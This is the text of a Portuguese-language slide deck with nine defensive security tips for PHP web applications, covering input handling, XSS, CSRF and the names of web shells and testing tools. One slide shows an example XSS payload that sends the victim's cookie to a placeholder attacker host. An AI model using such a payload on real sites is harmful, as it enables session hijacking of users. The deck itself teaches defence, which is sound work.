Este documento fornece 9 dicas de segurança para PHP e aplicações web, incluindo remover informações desnecessárias, isolar aplicações, desabilitar recursos externos, tratar dados de usuários, evitar IDs primárias, prevenir cross-site scripting e forgery, e usar checksums e controle de versão.
2. Eu? Sou este ai
https://github.com/joubertredrat
https://br.linkedin.com/in/joubertredrat
https://twitter.com/joubertredrat
http://www.vivaolinux.com.br/~joubertredrat
* no meu Linkedin explica o
porque do apelido RedRat
https://creativecommons.org/licenses/by-sa/4.0/
Dicas de segurança para o PHP e seus amigos
3. Dicas de segurança para o PHP e seus amigos
INFORMAÇÃO É PODER
QUEM TEM INFORMAÇÃO
DOMINA O MUNDO
4. Dicas de segurança para o PHP e seus amigos
1ª DICA
REMOVER INFORMAÇÕES DESNECESSÁRIAS
5. Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
6. Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
7. Dicas de segurança para o PHP e seus amigos
2ª DICA
ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
8. Dicas de segurança para o PHP e seus amigos
2ª DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
9. Dicas de segurança para o PHP e seus amigos
3ª DICA
DESABILITAR OU EVITAR RECURSOS EXTERNOS
10. Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
R57 R6
C99Shell C100Shell
bypass Tool25
b374k
GaZa
11. Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
http://php.net/allow-url-include
12. Dicas de segurança para o PHP e seus amigos
4ª DICA
USAR URL AMIGÁVEIS E EVITAR QUERY STRING
13. Dicas de segurança para o PHP e seus amigos
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
14. Dicas de segurança para o PHP e seus amigos
5ª DICA
TRATAR OS DADOS VINDOS DO USUÁRIO
MESMO ASSIM QUER USAR QUERY STRING?
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
15. Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
filter_var
mysqli_stmt_bind_param
PDOStatement::bindValue
DateTime::getLastErrors();
is_(bool,callable,numeric,float,string,object,etc)
Libs no Packagist
16. Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
Quer fazer testes?
sqlmap Zed Attack Proxy “ZAP”
BeEF sqlninja
17. Dicas de segurança para o PHP e seus amigos
6ª DICA
EVITAR O USO DA PRIMARY KEY OU ID
18. Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
• UUID
• GUID
• MD5/CRC32/SHA1/SHA256
• Hash ou Ofuscamento
19. Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
20. Dicas de segurança para o PHP e seus amigos
7ª DICA (PRIMA DA 5ª DICA)
CROSS-SITE SCRIPTING
21. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
22. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
23. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
24. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
25. Dicas de segurança para o PHP e seus amigos
8ª DICA
CROSS SITE REQUEST FORGERY
26. Dicas de segurança para o PHP e seus amigos
8ª DICA - CROSS SITE REQUEST FORGERY
27. Dicas de segurança para o PHP e seus amigos
9ª DICA
USAR CHECKSUM OU O VCS AO SEU FAVOR
28. Dicas de segurança para o PHP e seus amigos
9ª DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
29. Dicas de segurança para o PHP e seus amigos
ACABOU AS DICAS POR HOJE
PERGUNTAS?
FALA QUE NÃO
TEM